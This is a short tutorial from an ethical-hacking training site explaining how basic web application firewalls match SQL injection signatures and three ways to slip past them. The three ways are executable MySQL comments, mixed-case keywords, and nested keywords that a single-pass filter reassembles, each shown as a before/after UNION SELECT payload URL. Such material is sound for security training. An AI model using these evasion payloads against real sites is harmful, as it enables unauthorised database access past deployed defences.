Filename | Basic WAF Bypassing within SQLi |
Permission | rw-r--r-- |
Author | Unknown |
Date and Time | 7/26/2016 |
Label | Basic Tutorials| Penetration |
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan
Hey all,
I have recently noticed quite a few CEH candidates are having trouble with challenges that involve WAF bypassing, so here's a tutorial/reference for bypassing basic WAFs.
What is a WAF?
WAF stands for Web Application Firewall. A WAF is put in place by the web application's administrator in an attempt to block attacks such as SQLi and XSS before they reach the application. Basic WAFs detect malicious requests by matching request parameters against a list of signature rules (typically regular expressions for keywords such as UNION SELECT), and some filters go further and escape or strip the matched keywords out of the request. The match is made against the raw request string, not against the query as the backend database will parse it, so any obfuscation that changes the string while preserving its SQL meaning can slip past the rules. That is why the methods below work against basic WAFs; a WAF that normalises input before matching (URL-decodes it, lowercases it and resolves comments) defeats the simplest of them, which is the first thing to suspect when a bypass does not work.
Methods of Bypass
There are many more ways of bypassing these than I can list here, but this is a basic overview of three common and easy methods to try first.
1. Comments
Comments can carry the payload past the WAF: the signature is looking for the bare keyword, but the backend database still executes the keyword when it is wrapped in a comment the database treats as code. In the example below the wrapper is the MySQL executable comment /*! ... */, whose contents MySQL runs as SQL while other databases treat them as an ordinary comment, so this form only works against a MySQL backend.
Example
Before:
Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--
After:
Code:
http://site.com/vuln.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--
2. Capitalization of Keywords
Because detections are signature based, and a naive signature is a case-sensitive string match, mixing the case of keywords can slip past the rule. SQL keywords are case-insensitive, so the database still reads uNiOn SeLeCt as UNION SELECT. A WAF that lowercases the input before matching is not fooled by this.
Example
Before:
Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--
After:
Code:
http://site.com/vuln.php?id=-1 uNiOn SeLeCt 1,2,3--
3. Exploiting Escapes
Some WAFs do not block the request but instead escape the detected keywords such as UNION, SELECT, ORDER BY, etc. by stripping them out of the parameter. If the filter makes only one pass, this can be used to our advantage by nesting the detected word inside another copy of itself: the filter removes the inner copy and the outer letters join back up into the original keyword.
Example
Before:
Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--
After:
Code:
http://site.com/vuln.php?id=-1 UNIunionON SEselectLECT 1,2,3--
Assuming the filter strips the keywords "union" and "select" in a single pass, UNIunionON becomes UNION and SEselectLECT becomes SELECT, so the query reaches the database as -1 UNION SELECT 1,2,3-- and executes as normal. A filter that repeats the stripping until nothing matches removes the reassembled keyword as well, and the request then arrives at the database without the keywords and fails, so check how many passes the filter makes before relying on this.
www.extremehacking.org
Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE, TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India